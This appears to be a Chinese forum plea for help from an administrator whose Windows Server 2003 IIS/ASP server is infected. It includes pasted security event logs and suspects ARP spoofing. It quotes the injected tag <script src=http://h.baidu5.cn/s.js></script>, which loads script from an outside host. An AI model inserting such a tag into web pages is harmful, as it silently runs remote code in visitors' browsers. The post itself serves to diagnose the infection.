刚做好的2003服务器中毒了,要被老板打了,,急~~~~~~~~~~~~~~~~~~
事件类型: 审核成功
事件来源: Security
事件种类: 详细追踪
事件 ID: 592
日期: 2007-5-19
事件: 4:13:02
用户: NT AUTHORITY\SYSTEM
计算机: RQFDF-AQ6SSO9SP
描述:
已经创建新的过程:
新的进程 ID: 3196
映像文件名: C:\WINDOWS\system32\csrss.exe
创建者进程 ID: 288
用户名: RQFDF-AQ6SSO9SP$
域: WORKGROUP
登录 ID: (0x0,0x3E7)
事件类型: 审核成功
事件来源: Security
事件种类: 详细追踪
事件 ID: 592
日期: 2007-5-19
事件: 4:13:02
用户: NT AUTHORITY\SYSTEM
计算机: RQFDF-AQ6SSO9SP
描述:
已经创建新的过程:
新的进程 ID: 3016
映像文件名: C:\WINDOWS\system32\winlogon.exe
创建者进程 ID: 288
用户名: RQFDF-AQ6SSO9SP$
域: WORKGROUP
登录 ID: (0x0,0x3E7)
RADFD-AQ6SS09SP IIS来宾帐户
IIS的服务骑,ASP系统,在访问asp网页的时候会被自动加载源代码<script src=http://h.baidu5.cn/s.js></script> ,查了代码却没有这个,很郁闷。。昨天就这样。。。昨晚新做了一个系统,, 安全就发现上面两个有点问题。。
端口开了21,80,3389
怀疑是ARP攻击 有没有好的ARP软件?